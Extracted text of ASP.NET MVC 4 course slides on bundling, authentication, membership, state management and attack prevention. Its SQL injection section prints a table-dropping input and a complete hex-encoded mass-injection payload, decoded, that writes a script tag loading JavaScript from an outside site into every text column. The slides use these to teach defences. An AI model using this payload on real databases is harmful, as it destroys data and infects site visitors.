On the other hand, if the JavaScript and CSS are in external
files cached by the browser, the size of the HTML document is
reduced without increasing the number of HTTP requests
The only exception where inlining is preferable is with home
pages because home pages that have few (perhaps only one)
page view per session may find that inlining JavaScript and CSS
results in faster end-user response times
Performance
9. 26
11. Minify JavaScript and CSS

Minification is the practice of removing unnecessary
characters from code to reduce its size thereby
improving load times
When code is minified all comments are removed, as well as
unneeded white space characters (space, newline, and tab)
Even if you gzip your scripts and styles, minifying them will still
reduce the size by 5% or more
13
Performance
9. 27
12. Avoid Redirects

One of the most wasteful redirects happens frequently
and web developers are generally not aware of it
It occurs when a trailing slash (/) is missing from a URL
For example, going to http://astrology.yahoo.com/astrology
results in a 301 response containing a redirect to
http://astrology.yahoo.com/astrology/
Performance
9. 28
Split Components Across Domains

Splitting components allows you to maximize parallel
downloads
Make sure youre using not more than 2-4 domains because of
the DNS lookup penalty
For example, you can host your HTML and dynamic content on
www.example.org and split static components between
static1.example.org and static2.example.org
Performance Research, Part 4: Maximizing Parallel Downloads in the Carpool Lane

http://yuiblog.com/blog/2007/04/11/performance-research-part-4/
14
10. 1
Module 10
Using JavaScript and jQuery for
Responsive MVC 4 Web Applications
Web Applications
10. 2
Using JavaScript and jQuery for Responsive MVC 4 Web Applications
Contents
Exam Topic: Design and implement UI behavior
Implement client validation
Use JavaScript and the DOM to control application behavior
Extend objects by using prototypal inheritance
Implement the UI by using JQuery
Exam Topic: Reduce network bandwidth
Bundle and minify scripts (CSS and JavaScript)
Compress and decompress data (using gzip/deflate; storage)
Plan a content delivery network (CDN) strategy, for example, Windows Azure CDN
From the 20480 HTML5 course review the following

20480.03.JavaScript
20480.05.Ajax
20480.07.Objects
20480.C.Cross.Domain.Requests
10. 3
Optimization
Bundling, Minification, and Compression

Bundling
Combining multiple files into a single request
Minification
Stripping whitespace and comments and unused functions and
using shorter variable and parameter names
(function(){console.log(10)})()
Compression
(function () { // firebrand
var apples = 10;
function neverUsed() {
console.log("never used");
}
console.log(apples);
})();
Compressing files on the web server and decompressing them on

the browser to reduce bandwidth requirements
a.html (120kb) a.gzip (30kb)
Optimization
10. 4
Bundling and Minification

Bundling and minification are two techniques you can
use in ASP.NET 4.5 to improve request load time
Improves load time by reducing the number of requests to the
server and reducing the size of requested assets
Use bundling instead of embedding resources in a DLL
Minification is disabled when debug is true

Unless BundleTable.EnableOptimizations is true in Global.asax
{version} is used to automatically create a bundle with

the latest version of jQuery in your Scripts folder
public static void RegisterBundles(BundleCollection bundles) {
bundles.Add(new ScriptBundle("~/bundles/jquery").Include(
"~/Scripts/jquery-{version}.js"));
http://www.asp.net/mvc/tutorials/mvc-4/bundling-and-minification
Optimization
10. 5

Debug mode
<compilation debug="true" />
<script src="/Scripts/bootstrap.js"></script>
<script src="/Scripts/respond.js"></script>
Release mode
<compilation debug="false" />
<script src="/bundles/bootstrap?v=2Fz3B0iizV2NnnamQFrxNbYJNTFeBJ2GM05SilbtQU1"></script>
Note: the hash/digest used will automatically change if any file

in the bundle (or its minified version!) changes
ASP.NET will automatically minify your files if you have

not created a .min. version (but see next slide!)
Optimization
10. 6
Minification Changes
As well as stripping whitespace and comments,
minification would change this
function StartController($scope, $location, $rootScope) { }
To this
function StartController(n, t, i) { }
When using AngularJs, for dependency injection to

work, the argument names must not be changed
This isnt something you can change on the built in bundle
types, [] write your own IBundleTransform - Microsoft
public class CustomTransform : IBundleTransform {
public void process(BundleContext context, BundleResponse response) {
System.Web.Optimization making function argument names stay the same for certain functions
http://stackoverflow.com/questions/13032721/system-web-optimization-making-function-argument-names-stay-the-same-for-certain
10. 7
Optimization
HTTP Compression
To enable gzip compression in .config for IIS
<system.webServer>
<httpCompression
directory="%SystemDrive%\inetpub\temp\IIS Temporary Compressed Files">
<scheme name="gzip" dll="%Windir%\system32\inetsrv\gzip.dll"/>
<dynamicTypes>
<add mimeType="text/*" enabled="true"/>
<add mimeType="message/*" enabled="true"/>
<add mimeType="application/javascript" enabled="true"/>
<add mimeType="*/*" enabled="false"/>
</dynamicTypes>
<staticTypes>
<add mimeType="text/*" enabled="true"/>
<add mimeType="message/*" enabled="true"/>
<add mimeType="application/javascript" enabled="true"/>
<add mimeType="*/*" enabled="false"/>
</staticTypes>
</httpCompression>
<urlCompression doStaticCompression="true" doDynamicCompression="true"/>
</system.webServer>
HTTP Compression <httpCompression>

http://www.iis.net/configreference/system.webserver/httpcompression
10. 8
Optimization
HTTP Compression
What is gzip compression ratio?
It depends!
File
Compressed Size / Ratio
1Gb file full for zeros
~120kb
Image files in a format that is compressed

natively (gif, jpg, png, and so on)
Little or no compression
Binary files like program executables (exe)
~2:1 compression
Plain text, HTML or other markup
3:1 or 4:1 or more
11. 1
Module 11
Controlling Access to ASP.NET
MVC 4 Web Application
Web Applications
Controlling Access to ASP.NET MVC 4 Web Application
11. 2
Contents
Topic
Slide
Authentication
Authorization
Forms Auth.
ASP.NET Membership
Impersonation
22
WIF and ACS
23
Custom Security
25
Misc
28
Exam Topic: Configure and apply authorization

Create roles
Authorize roles by using configuration
Authorize roles programmatically
Create custom role providers
Implement WCF service authorization
Exam Topic: Implement a secure site with ASP.NET
Secure communication by applying SSL certificates
Salt and hash passwords for storage
Exam Topic: Design and implement claims-based

authentication across federated identity stores
Implement federated authentication by using
Windows Azure Access Control Service
Create a custom security token by using Windows
Identity Foundation
Handle token formats (for example, oAuth, OpenID,
LiveID, and Facebook) for SAML and SWT tokens
Exam Topic: Configure authentication

Authenticate users
Enforce authentication settings
Choose between Windows, Forms,
and custom authentication
Manage user session by using cookies
Configure membership providers
Create custom membership providers
11. 3
Authentication
ASP.NET and IIS Authentication Combinations

Authentication is set with a combination of settings in
IIS .config and ASP.NET Web.config
IIS Authentication on
ASP.NET authentication off
Basic
Non-IE, prompts for

Windows accounts
mode="Windows"
Digest
Non-IE, prompts for

Windows account
<authentication mode="Windows" />
Windows
Integrated
IE/Firefox auto-login
NTLM, Kerberos
Use Windows for intranet sites

where users have a Windows account
IIS Authentication off
ASP.NET authentication on
Anonymous
mode="Forms"
Use a MembershipProvider
mode="None"
Federated/claims-based
mode="Passport"
Pay Microsoft
IUSR_computername
Use Forms for internet sites

where users are stored in a
Membership provider or claims
<authentication mode="Forms" />
Authorization
11. 4
MVC Authorizing
To ensure users are authenticated
Anonymous users will be redirected to login view
[Authorize]
public ActionResult Create() {
To authorize by user and role or Windows group

String values depend on Windows or Forms authentication
[Authorize(Users="Mary,Omar", Roles="Admin")]
public ActionResult Create() {
When authenticated we can authorize by user and role

if (User.Identity.Name == "Fred") {
return View("SpecialViewForFred");
} else {
return View();
if (User.IsInRole("Sales"))
}
return View("SpecialViewForSales");
11. 5
Authorization
MVC Authorizing
If you apply Authorize to a whole class, you can still
allow anonymous for individual actions
[Authorize] // require all requests to authenticate
public class ProductController : Controller {
[AllowAnonymous] // disable authentication for this action
{
}
public ActionResult Display() // inherit from controller
{
}
[Authorize(Users="Mary,Omar", Roles="Admin")]
public ActionResult Edit()
{
}
}
11. 6
Authorization
Finding Out About the Current User

HttpContext.User returns an IPrincipal object
IsInRole(string)
Identity
if (User.IsInRole("Sales"))
Identity property implements IIdentity interface

AuthenticationType (NTLM, custom, and so on)
IsAuthenticated (true/false)
Name
if (User.Identity.Name == "Fred")
Could also use Roles class in System.Web.Security

using System.Web.Security;
if (Roles.IsUserInRole("John", "HR"))
Forms Authentication
11. 7
Configuring
Defaults for strings are shown, others are underlined
<system.web>
Cookie name
<authentication mode="Forms">
<forms name=".ASPXAUTH"
Change to MVC routes
loginUrl="login.aspx"
defaultUrl="default.aspx"
protection="[All|None|Encryption|Validation]"
timeout="30"
minutes
If true you must configure SSL certificate in IIS
path="/"
requireSSL="[true|false]"
slidingExpiration="[true|false]"
enableCrossAppRedirects="[true|false]"
cookieless="[UseUri|true|UseCookies|false|AutoDetect|UseDeviceProfile]"
domain=""
ticketCompatibilityMode="[Framework20|Framework40]">
<credentials>
<user name="Bob" password="secret"/>
</credentials>
forms Element for authentication (ASP.NET Settings Schema)
http://msdn.microsoft.com/en-us/library/vstudio/1d3t3c61(v=vs.100).aspx
Forms Authentication
11. 8
FormsAuthentication Properties
Static read-only properties (set in .config)
IsEnabled, FormsCookieName, FormsCookiePath, RequireSSL,
SlidingExpiration, CookieDomain, CookieMode, DefaultUrl,
LoginUrl, Timeout
Methods
SetAuthCookie, GetAuthCookie: Creates an authentication
ticket for the supplied user name and adds it to the cookies
collection of the response
Encrypt, Decrypt: Creates a string containing an encrypted
forms-authentication ticket suitable for use in an HTTP cookie
RedirectFromLoginUrl, GetRedirectUrl: Redirects user back to
the originally requested URL or the default URL
SignOut: Removes the forms-authentication ticket from browser
FormsAuthentication Class
http://msdn.microsoft.com/en-us/library/system.web.security.formsauthentication.aspx
ASP.NET Membership
11. 9
Providers
SqlMembershipProvider in .NET 2.0 and later
Uses fixed schema for users and roles (aspnetdb.mdf by default)
Focused on traditional membership (user has a username and a
password), in OAuth/OpenID the user doesnt have a password
SimpleMembershipProvider in .NET 4.5 and later

Designed as a replacement for the previous ASP.NET Role and
Membership provider system
The ASP.NET MVC 4 Internet application template
AccountController requires SimpleMembership and is not
compatible with previous MembershipProviders
You can continue to use existing ASP.NET Role and Membership
providers in ASP.NET 4.5 and ASP.NET MVC 4 - just not with the
ASP.NET MVC 4 AccountController
SimpleMembership, Membership Providers, Universal Providers
http://weblogs.asp.net/jgalloway/archive/2012/08/29/simplemembership-membership-providers-universal-providers-and-the-new-asp-net-4-5-web-forms-and-asp-net-mvc-4-templates.aspx
ASP.NET Membership
11. 10
SimpleMembershipProvider
SimpleRoleProvider simply implements the
RoleProvider abstract base class (from .NET 2.0) and
does not add anything more
ExtendedMembershipProvider abstract class inherits
from the core MembershipProvider abstract base class
Also added a new WebSecurity class which provides a nice
faade to SimpleMembershipProvider
You might have a users table and want to

integrate it with SimpleMembership
SimpleMembership requires that there are two columns on your
users table an ID column and a username column, but
they can be named whatever you want
Using SimpleMembership With ASP.NET WebPages
http://blog.osbornm.com/2010/07/21/using-simplemembership-with-asp.net-webpages
ASP.NET Membership
11. 11
Now that we have created our users table we need to
wire it up to SimpleMembership so that
SimpleMembership knows what columns to use
Parameters of WebSecurity.InitializeDatabaseFile are
name of the database file
name of the table you are using for the users table
name of the column being used for the ID

name of the column you are using for the username
WebSecurity.InitializeDatabaseFile(
"SecurityDemo.sdf", "Users", "UserID", "Username", true);
Last parameter indicates if the table should be automatically

created
ASP.NET Membership
11. 12
To create a register view
Where the anonymous object represents the extra columns in
your users table
WebSecurity.CreateUserAndAccount(username, password, new {
FirstName = fname, LastName = lname, Email = email,
StartDate = DateTime.Now, Bio = bio});
To create a login view

if (WebSecurity.Login(username, password)) {
var returnUrl = Request.QueryString["ReturnUrl"];
if(returnUrl.IsEmpty()) {
Response.Redirect(~/Account/Profile);
} else {
Response.Redirect(returnUrl);
}
}
11. 13
ASP.NET Membership
Table Schemas
SqlMembershipProvider
Universal Providers
ASP.NET Membership
11. 14
ASP.NET MVC 4 Basic template

The Basic template has configuration in place to use
ASP.NET Membership with the Universal Providers
<profile defaultProvider="DefaultProfileProvider">
<providers>
<add name="DefaultProfileProvider" type="System.Web.Providers.DefaultProfileProvider, System.Web.Providers,
..., PublicKeyToken=31bf3856ad364e35" connectionStringName="DefaultConnection" applicationName="/" />
</providers>
</profile>
<membership defaultProvider="DefaultMembershipProvider">
<providers>
<add name="DefaultMembershipProvider" type="System.Web.Providers.DefaultMembershipProvider,
System.Web.Providers, ..., PublicKeyToken=31bf3856ad364e35" connectionStringName="DefaultConnection"
enablePasswordRetrieval="false" enablePasswordReset="true" requiresQuestionAndAnswer="false"
requiresUniqueEmail="false" maxInvalidPasswordAttempts="5" minRequiredPasswordLength="6"
minRequiredNonalphanumericCharacters="0" passwordAttemptWindow="10" applicationName="/" />
</providers>
</membership>
<roleManager defaultProvider="DefaultRoleProvider">
<providers>
<add name="DefaultRoleProvider" type="System.Web.Providers.DefaultRoleProvider, System.Web.Providers, ...,
PublicKeyToken=31bf3856ad364e35" connectionStringName="DefaultConnection" applicationName="/" />
</providers>
</roleManager>
<sessionState mode="InProc" customProvider="DefaultSessionProvider">
<providers>
<add name="DefaultSessionProvider" type="System.Web.Providers.DefaultSessionStateProvider,
System.Web.Providers, ..., PublicKeyToken=31bf3856ad364e35" connectionStringName="DefaultConnection" />
</providers>
</sessionState>
ASP.NET Membership
11. 15
ASP.NET MVC 4 Internet template

The Internet template uses
SimpleMembership
\Models\AccountModels.cs defines a user account
and includes annotations to define keys and such
\Filters\InitializeSimpleMembershipAttribute.cs
creates the membership database, then calls
WebSecurity.InitializeDatabaseConnection which
verifies that the underlying tables are in place
and marks initialization as complete (for the
applications lifetime)
\Controllers\AccountController.cs makes heavy
use of OAuthWebSecurity (for OAuth account
registration / login / management) and
WebSecurity (WebSecurity provides account
management services for ASP.NET MVC)
ASP.NET Membership
11. 16
WebSecurity Class (SimpleMembershipProvider)

CurrentUserName
Gets the user name for the current user
ChangePassword
Changes the password for the specified user
ConfirmAccount(String)
Confirms that an account is valid and activates the

account
CreateAccount
Creates a new membership account using the specified

user name and password and optionally lets you specify
that the user must explicitly confirm the account
CreateUserAndAccount
Creates a new user profile entry and a new membership

account
GeneratePassword
ResetToken
Generates a password reset token that can be sent to a

user in email
Login/Logout
Logs the user in/out
RequireRoles
If the current user is not in all of the specified roles, sets

the HTTP status code to 401 (Unauthorized)
ResetPassword
Resets a password by using a password reset token
WebSecurity Class
http://msdn.microsoft.com/en-us/library/webmatrix.webdata.websecurity(v=vs.111).aspx
11. 17
ASP.NET Membership
Roles Class Methods

AddUserToRole
AddUserToRoles
AddUsersToRole
AddUsersToRoles
Adds user(s) to role(s)
CreateNewRole
Creates a new role
DeleteRole
Deletes an existing role
FindUsersInRole
Returns a collection of users in a role
GetAllRoles
Returns a collection of all roles that currently exist
GetRolesForUser
Returns a collection of roles for the current user
IsUserInRole
Returns true if the user is a member of a specified role
RemoveUserFromRole
RemoveUserFromRoles
RemoveUsersFromRole
RemoveUsersFromRoles
Removes user(s) from role(s)
11. 18
ASP.NET Membership
Membership Methods (SqlMembershipProvider)

CreateUser
Add a user to the database
DeleteUser
Delete a user from the database
FindUserByEmail
FindUserByName
Gets a collection of membership users for whom the email addresses contain the specified e-mail addresses
or user names to match
GeneratePassword
Creates a random password of the specified length
GetAllUsers
Returns a collection of all users in the database
GetNumberOfUsersOnline Returns the number of users currently logged on

GetUser
Returns a MembershipUser object representing the

current logged-on user
GetUserByEmail
Gets a user name for which the e-mail address for the
user matches the specified email address
UpdateUser
Updates the database with any changed values
ValidateUser
Verifies that the user name and password are valid
using System.Web.Security;
if (Membership.ValidateUser("Fred", "secret"))
ASP.NET Membership
11. 19
Storing User Accounts in .Config

Credentials can be stored in the Web.config file as
Password formats: Clear text, MD5, or SHA1
<forms>
<credentials passwordFormat="SHA1">
<user name="Eric" password="07B7..."/>
<user name="Sam" password="5753..."/>
Use the classes in System.Security.Cryptography

namespace to generate the hash
Or call the 2nd longest method in .NET
string passwordHashed =
FormsAuthentication.HashPasswordForStoringInConfigFile(pwd, "SHA1");
Longest is:
GetTextEffectCharacterIndexFromTextSourceCharacterIndex
11. 20
Impersonation
ASP.NET accesses resources using a specific account
Network Service (IIS 6.0), ApplicationPoolIdentity (IIS 7+)
The setting is configurable by

Explicitly define an identity to impersonate
Use IIS-authenticated account (browser user account unless
IIS enables anonymous then it will be IUSR_computername)
<identity impersonate="true" />
Or use a named account

<identity impersonate="true"
userName="DOMAIN\username"
password="password" />
10
WIF and ACS
11. 21
What are They?

What is Windows Identity Foundation?
WIF enables .NET developers to externalize identity logic from
their application, improving developer productivity, enhancing
application security, and enabling interoperability
What is Windows Azure Access Control Service?

ACS is a cloud-based service that provides an easy way to
authenticate and authorize users to gain access to your web
applications and services while allowing authentication and
authorization to be factored out of your code
WIF and ACS
11. 22
Types Used
IClaimsIdentity
Extends the IIdentity interface to incorporate functionality
needed to implement claims-based identity e.g. Claims property
ClaimTypes class and its static properties

Use the ClaimTypes class (not an enum!) to search for a
particular type of claim in a ClaimSet or to create a claim
ClaimTypes.DateOfBirth, ClaimTypes.Email, and so on
if (claim.ClaimType == ClaimTypes.NameIdentifier) {
var identifier = claim.Value;
if (claim.ClaimType == "http://schemas.microsoft.com/...") {
var provider = claim.Value;
Claim Class
http://msdn.microsoft.com/en-us/library/system.identitymodel.claims.claim.aspx
IClaimsIdentity Interface
http://msdn.microsoft.com/en-us/library/microsoft.identitymodel.claims.iclaimsidentity.aspx
11
Custom Security
11. 23
Using HttpModules
An HTTP module is an assembly that is called on every
request that is made to your application
Can examine incoming requests and take action, so can perform
custom authentication or other security checks
Compare to HTTP handlers which are only called for registered
file extensions
Might implement one for mixed security authentication

e.g. Windows user but custom role
Custom Security
11. 24
Implementing Custom SimpleProviders

You can customize the new simple membership
provider by extending two abstract classes
WebMatrix.WebData.ExtendedMembershipProvider, and the
standard System.Web.Security.RoleProvider which was moved
to the System.Web.ApplicationServices.dll assembly
LLBLGen generates one DAL that supports a dozen or more
database providers out-of-the-box
dotConnect for Oracle implements SimpleMembership
functionality as custom OracleExtendedMembershipProvider and
OracleExtendedRoleProvider classes
SimpleMembershipProvider in MVC4 for MySql, Oracle, and more with LLBLGen

http://www.mattjcowan.com/funcoding/2012/11/10/simplemembershipprovider-in-mvc4-for-mysql-oracle-and-more-with-llblgen/
SimpleMembership and SimpleRole Providers for Oracle in ASP.NET MVC 4 Application Tutorial
http://www.devart.com/dotconnect/oracle/articles/extendedmembership-tutorial.html
12
Custom Security
11. 25
ClaimsAuthorizationManager
.NET 4.5 ships with a claims-based authorization
infrastructure around the ClaimsAuthorizationManager
class
Claims-based authorization encourages you to have a clean
separation of business and authorization code and thats much
better than sprinkling role checks all over your code base
but the API is not very approachable, especially in the face of
modern application development like MVC or Web API
All the base APIs in .NET 4.5 allow using claims-based
authorization, you just have to write your own plumbing
Thinktecture.IdentityModel contains an authorization filter
called ClaimsAuthorizeAttribute to make the connection to
ClaimsAuthorizationManager (see link below for details)
Using Claims-based Authorization in MVC and Web API
http://leastprivilege.com/2012/10/26/using-claims-based-authorization-in-mvc-and-web-api/
Miscellaneous
11. 26
Passwords
A study to find the top 25 leaked passwords of 2012 has
revealed too many people are still using password,
123456 and 12345678 for their login credentials
The average Web user maintains 25 separate accounts
but uses just 6.5 passwords to protect them, according
to a landmark study (PDF) from 2007
A PC running a single AMD Radeon HD7970 GPU can try
on average an astounding 8.2 billion password
combinations each second
Why passwords have never been weakerand crackers have never been stronger
http://arstechnica.com/security/2012/08/passwords-under-assault/
How I became a password cracker

http://arstechnica.com/security/2013/03/how-i-became-a-password-cracker/
13
12. 1
Module 12
Building a Resilient ASP.NET
Web Applications
Building a Resilient ASP.NET MVC 4 Web Applications
12. 2
Contents
Topic
Slide
Preventing Attacks
State Management
Exam Topic: Configure state management

Choose a state management mechanism (in-process and
out of process state management, ViewState)
Plan for scalability
Use cookies or local storage to maintain state
Apply configuration settings in web.config file
Implement sessionless state (for example, QueryString)
Exam Topic: Implement a secure site with ASP.NET

Use HTML encoding to prevent cross-site scripting attacks (ANTI-XSS Library)
Implement deferred validation and handle unvalidated requests, for example,
form, querystring, and URL
Prevent SQL injection attacks by parameterizing queries
Prevent cross-site request forgeries (XSRF)
Exam Topic: Manage data integrity
Apply encryption to application data
Apply encryption to the configuration sections of an application
Sign application data to prevent tampering
Preventing Attacks
12. 3
SQL Injection
Exploits of a Mom
http://xkcd.com/327/
Preventing Attacks
12. 4
SQL Injection
In which malicious code is inserted into strings that are
passed to an SQL database for parsing and execution
For example, this bad code reads a value posted from a web
form and concatenates it into a SQL statement
var city = Request.Form["ShipCity"];
var sql = "select * from OrdersTable where ShipCity = '" + city + "'";
A malicious user could enter the following in ShipCity textbox

Redmond'; drop table OrdersTable--
Reject the following characters: ' ; -- /* */ xp_

BUT much better to use parameters instead
SQL Injection
http://msdn.microsoft.com/en-us/library/ms161953.aspx
12. 5
Preventing Attacks
What Does This Do?

script.asp?var=random';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C00410052004500200040005400200
07600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290
020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F00520
0200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D00650020006600720
06F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E0073002000620
0200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E007800740079007000650
03D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E007800740
07900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780
074007900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F007200200
04600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F0
07200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F00530
0540041005400550053003D0030002900200042004500470049004E002000650078006500630028002700750070006400610074006500200
05B0027002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280
063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B00270
027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F007700770077002E006E0069006800610
06F007200720031002E0063006F006D002F0031002E006A0073003E003C002F007300630072006900700074003E002700270027002900460
0450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F00720
0200049004E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0
043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F00430075007200730
06F007200%20AS%20NVARCHAR(4000));EXEC(@S);--
DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name

from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35
or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set
['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script
src=http://www.nihaorr1.com/1.js></script>''')FETCH NEXT FROM Table_Cursor INTO @T,@C END
CLOSE Table_Cursor DEALLOCATE Table_Cursor
Encoded SQL Injection
SQL Injection
http://www.gutizz.com/encoded-sql-injection/
http://www.blackhatlibrary.net/SQL_injection
Preventing Attacks
12. 6
MVCs Anti-Forgery Token support

Writes a unique value to an HTTP-only cookie and then the same
value is written to the form
When the page is submitted, an error is raised if the cookie
value doesn't match the form value
This prevents cross site request forgeries, that is, a form from
another site that posts to your site in an attempt to submit
hidden content using an authenticated user's credentials
The feature doesnt prevent any other type of data forgery or
tampering based attacks
To use it perform two steps

1. Decorate the action method (or controller) with the
[ValidateAntiForgeryToken] attribute
2. Call the HtmlHelper method @Html.AntiForgeryToken() inside
the form in your view
Prevent Cross-Site Request Forgery (CSRF) using ASP.NET MVCs AntiForgeryToken() helper
http://blog.stevensanderson.com/2008/09/01/prevent-cross-site-request-forgery-csrf-using-aspnet-mvcs-antiforgerytoken-helper/
Preventing Attacks
12. 7
Requiring HTTPS
Use the RequireHttpsAttribute to prevent unsecured
HTTP requests from being sent to an action method
[RequireHttps] // applies to all actions in controller
public class SomeController
{
[RequireHttps] // applies to this action only
public ActionResult SomeAction()
ASP.NET Development Server doesnt support HTTPS

Conditional compilation can help
#if !DEBUG
[RequireHttps] // applies to all actions in controller
#endif
public class SomeController
ASP.NET MVC RequireHttps in Production Only

http://stackoverflow.com/questions/1639707/asp-net-mvc-requirehttps-in-production-only
State Management
12. 8
Reading and Writing Cookies

Check if a cookie exists and display it if it does
@if (Request.Cookies["lastVisit"] != null) {
@Request.Cookies["lastVisit"].Value
} else {
@:No cookie with last visit
}
Define the cookie for the next visit

Expires makes cookie get stored in a file instead of memory
Response.Cookies["lastVisit"].Value = DateTime.Now.ToString();
Response.Cookies["lastVisit"].Expires = DateTime.Now.AddDays(1);
State Management
12. 9
Controlling Cookie Scope

Cookie scope can prevent vulnerabilities in browsers
from being exploited by hackers to trick the browser to
send your cookie to other web sites
Cookie scope can be
Limited to a specific folder using the Path property
Response.Cookies["lastVisit"].Path = "/Application1";
Expanded to any server in a domain using the Domain property

Response.Cookies["lastVisit"].Domain = "contoso.com";
State Management
12. 10
Storing Multiple Values in a Cookie

Maximum 4 KB per cookie, 20 cookies per site
Could store multiple values in a single cookie
Response.Cookies["info"]["firstName"] = "Tony";
Response.Cookies["info"]["border"] = "blue";
Response.Cookies["info"].Expires = DateTime.Now.AddDays(1);
(firstName=Tony) (border=blue)
Cookie data can be manually encrypted before being

stored
State Management
12. 11
Query Strings
Typical query string in URL
http://search.microsoft.com/results?mkt=en-US&q=hello+world
How to read the values

var s1 = Request.QueryString["mkt"];
var s2 = Request.QueryString["q"];
State Management
12. 12
Request Validation
ASP.NET validates requests for potentially dangerous
values (like JavaScript) automatically
Throws HttpRequestValidationException if it finds problem
The algorithm it uses is not documented for obvious reasons
If you want to disable this feature for an action

[ValidateInput(false)] public ActionResult Edit()
You must also switch mode to the old 2.0 version

The default of 4.0 means it cannot be disabled!
<httpRuntime requestValidationMode="2.0" />
Any numeric value smaller than 4.0 (for example, 3.7, 2.9, or 2.0) is interpreted as 2.0
Any number larger than 4.0 is interpreted as 4.0
HttpRuntimeSection.RequestValidationMode Property
http://msdn.microsoft.com/en-us/library/system.web.configuration.httpruntimesection.requestvalidationmode(v=vs.110).aspx
State Management
12. 13
HttpRequest.Unvalidated
To disable request validation for a specific field in a
request (for example, for an input element or query
string value), check Request.Unvalidated when you get
the item
var rawComment = Request.Unvalidated.Form["comment"];
If you disable request validation, you must manually

check the unvalidated user input for potentially
dangerous input
Request Validation in ASP.NET

http://msdn.microsoft.com/en-us/library/hh882339(v=vs.110).aspx
HttpRequest.Unvalidated Property
http://msdn.microsoft.com/en-us/library/system.web.unvalidatedrequestvalues.aspx
State Management
12. 14
Application State
Application state is shared and used to store
information that is not user-specific
An instance of the HttpApplicationState class
Lock to prevent another page from changing the

variable between the time that the process reads the
current value and the time it writes it
HttpContext.Application.Lock();
HttpContext.Application["PageRequestCount"] =
(int)(HttpContext.Application["PageRequestCount"]) + 1;
HttpContext.Application.UnLock();
Stays until explicitly removed or application ends

Better to use Cache which can adjust to low-memory conditions
State Management
12. 15
Responding to Application Events

Handle in a Global.asax file
Application_Start
Application is starting; use to initialize application variables
Application_End
Application is ending; use to free application resources
Application_Error
An unhandled error has occurred
Application_LogRequest
A request has been made; use to log information about requests
Other events include

PostLogRequest, BeginRequest, ResolveCacheRequest
State Management
12. 16
Configuring Cookieless Session State

A cookieless session enables ASP.NET to track sessions
using a query string in the URL instead of a cookie
<sessionState cookieless="true"
regenerateExpiredSessionId="true" />
Embedded after the slash following the application name

http://www.example.com/s(lit3py55t21...)/order
Cookieless (UseCookies is default; required for AJAX)

False or UseCookies: uses cookies
True or UseUri: uses URI
UseDeviceProfile: decides based on browser definition support
AutoDetect: equivalent to UseDeviceProfile; does not use
probing mechanism
12. 17
State Management
Responding to Session Events

Session_Start
Raised when a new session begins
Use to initialize session variables
Session_End
Raised when a session is abandoned or expires
but only when using InProc session mode
Use to free per-session resources
Default timeout is 20 minutes

To change it to five minutes
<sessionState timeout="5" />
Session.Timeout = 5;
12. 18
State Management
Choosing a Session State Mode

InProc (default)
Stores session state in the AppDomain of web site
Fastest mode and can store any type
StateServer
Stores session state in memory of a service called the ASP.NET
State Service; could be on same web server or another machine
Type must be serializable
SQLServer
Stores session state in a SQL Server database; session state must
be enabled on the database; type must be serializable
Slowest mode, but most recoverable
Custom, Off
<system.web>
<sessionState mode="Off" />
12. 19
State Management
Configuring Session State Modes

Configure to use SQL Server
Session timeout in minutes
<sessionState mode="SQLServer" timeout="20"

sqlConnectionString="Data Source=.;Integrated Security=SSPI;"
sqlCommandTimeout="30" />
Command timeout in seconds
Enable session state support on a database using

aspnet_regsql.exe
Uses tempdb by default
-d <database> -ssadd: adds support
-d <database> -ssremove: removes support
Calls SQL script: InstallSqlState.sql
Note: this utility is also used to enable other features
State Management
12. 20
Configuring Session State Modes

Configure to use State Server
<sessionState mode="StateServer"
stateConnectionString="tcpip=127.0.0.1:42424"
stateNetworkTimeout="10" />
The ASP.NET State Service must be running

Listens on port 42424
10
12. 21
State Management
Other Session State Configuration Options

Rename cookie for extra safety; security via obscurity
<sessionState cookieName="ASP.NET_SessionId"
Dynamically return connection strings when you have

multiple database servers
<sessionState partitionResolverType="type"
Log on to the session state SQL Server by using the host

identity (ApplicationPoolIdentity in IIS 7+)
<sessionState useHostingIdentity="true"
Or a specified identity
<identity impersonate="true"
username="..." password="..." />
12. 22
State Management
Design Choices
Technology
PROs
CONs
Cookie
Scalable, stored on browser
Can be disabled, insecure
QueryString
Scalable across multiple servers,

supported by all browsers
Insecure, very limited size
ViewState
Automatic, Web Forms only
Bulky pages, messy, evil
Session
Option for web farms and

recoverable storage
Can be difficult to scale
Application
Simple
Stays until removed
Cache
Automatic removal, expirations,

dependencies, priorites
In-memory only
TempData
Simple, automatically gets

removed when read, can last
beyond current request
Uses session state, MVC only
ViewData,
ViewBag
Simple
Only lasts for active request,

MVC only
ASP.NET State Management Recommendations

http://msdn.microsoft.com/en-us/library/z1hkazw7(v=vs.100).aspx
11
State Management
12. 23
machineKey Element
Controls tamper proofing and encryption of ViewState,
forms authentication tickets, and role cookies
For a single server the defaults are sufficient, but in a web farm
you must manually configure all servers to use the same keys
<machineKey validationKey="AutoGenerate,IsolateApps" [String=""
